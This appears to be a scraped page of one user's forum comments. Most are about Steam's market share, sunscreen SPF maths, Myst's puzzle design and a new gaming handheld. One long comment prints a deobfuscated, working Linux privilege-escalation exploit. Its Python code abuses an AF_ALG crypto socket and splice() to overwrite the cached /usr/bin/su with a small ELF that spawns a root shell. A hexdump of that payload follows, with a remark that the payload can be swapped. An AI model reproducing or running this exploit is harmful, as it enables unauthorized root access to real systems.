just learn acme

the yellow thing is an anchor, and the line in the water is a rope snapping.

courts tend to use a percentage limit to define what is and is not a monopoly. the law specifies that anything below 50% of the market can not be a monopoly, and the chart shows that they’re below that. making it about pc gaming in particular i believe would narrow the scope enough that the courts wouldn’t care.

that’s true.

the fraction of solar radiation blocked by something with a given spf s is 1-¹⁄ₛ. so spf 54 blocks 98.15% and 178 blocks 99.44%.

i don’t know if anyone needs this unless their job involves 16 hour days working outside in the nude…

well… that’s it then. case closed.

is steam really over 95% of the market? i think that’s where the limit is

whoa

played 'em all!

nah it’s a shit post

one of by favourite puzzle game series of all time. excepting the graphics it has stood the test of time beautifully.

myst is like the one franchise from this era that doesn’t do that. every puzzle has its solution written down in the world somewhere and simply exploring and reading basically guarantees that you’ll find it. it’s a world for you to immerse yourself in.

compare that to contemporary stuff like the king’s quest series, which is designed with the expectation that you fail over and over again, where puzzles have multiple valid solutions but all of them except one will s block you from solving another puzzle three hours later, with no prior indication.

myst is eminently solvable with basically no trial-and-error at all, which is why it still endures.

violet?

i don’t know if that’s possible

i’m probably still gonna get one or two of these, because i want to play on a bigger screen with deck-like controls.

it’s been known for many years now that the new controller would have basically nothing to do with the old one. it had too many compromises.

could be that the touch pads are the same size and everything else is smaller.

there are a lot of reviews already and most of them seem disappointed. which is weird because the price seems te be the main sticking point.

i think it’s exactly the same size and layout as the steam deck, no? that thing is hella comfortable to hold.

here’s my attempt at deobfuscating it:

#!/usr/bin/env python3

import os
from ctypes import c_int32 as i32, c_char as char
import zlib
import socket as s


def inject(file, offset, data):
    # connect to kernel crypto system's aeda endpoint
    sock = s.socket(s.AF_ALG, s.SOCK_SEQPACKET)
    sock.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
 
    # set cipher key and tag size, then wait for the system to be ready
    sock.setsockopt(s.SOL_ALG, s.ALG_SET_KEY, (char * 68)(8, 0, 1, 0, 0, 0, 0, 16))
    sock.setsockopt(s.SOL_ALG, s.ALG_SET_AEAD_AUTHSIZE, None, optlen=4)
    conn, _ = sock.accept()
 
    # pass in configuration
    conn.sendmsg(
        [b"AAAA" + data],  # pad to tag size
        [
            (s.SOL_ALG, s.ALG_SET_OP, i32(s.ALG_OP_DECRYPT)),  # set operation
            (s.SOL_ALG, s.ALG_SET_IV, (char * 20)(16)),    # set init vector
            (s.SOL_ALG, s.ALG_SET_AEAD_ASSOCLEN, i32(8)),  # set associated data length
        ],
        s.MSG_MORE,
    )

    # move file through a pipe to the connection without copying
    r, w = os.pipe()
    os.splice(file, w, offset + 4, offset_src=0)
    os.splice(r, conn.fileno(), offset + 4)
    try:
        conn.recv(8 + offset)
    except:
        pass


binary = os.open("/usr/bin/su", os.O_RDONLY)
offset = 0
payload = zlib.decompress(
    bytes.fromhex(
        "78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301"
        "d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b96"
        "75c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"
    )
)

while offset < len(payload):
    inject(binary, offset, payload[offset : offset + 4])
    offset += 4

os.system("su")

as far as i understand the writeup, the weakness is in the splice() function, because it silently crosses an auth boundary. the payload looks like this:

00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............ # ELF x86-64 v1, executable
00000010: 0200 3e00 0100 0000 7800 4000 0000 0000  ..>.....x.@.....
00000020: 4000 0000 0000 0000 0000 0000 0000 0000  @...............
00000030: 0000 0000 4000 3800 0100 0000 0000 0000  ....@.8......... # contains 1 56-bit program header
00000040: 0100 0000 0500 0000 0000 0000 0000 0000  ................ # program header starts
00000050: 0000 4000 0000 0000 0000 4000 0000 0000  ..@.......@.....
00000060: 9e00 0000 0000 0000 9e00 0000 0000 0000  ................ # flags r-x
00000070: 0010 0000 0000 0000 31c0 31ff b069 0f05  ........1.1..i.. # program starts
00000080: 488d 3d0f 0000 0031 f66a 3b58 990f 0531  H.=....1.j;X...1
00000090: ff6a 3c58 0f05 2f62 696e 2f73 6800 0000  .j<X../bin/sh...

it’s an ELF header that replaces the one on the cached version of the binary (su in this case).

Edit: came back to this because i realized i had the wrong flags. the values were right but they were for the wrong socket type.

you’d only need to change the payload part, which is a compiled x86 ELF header.

“this is the one thing we didn’t want to happen”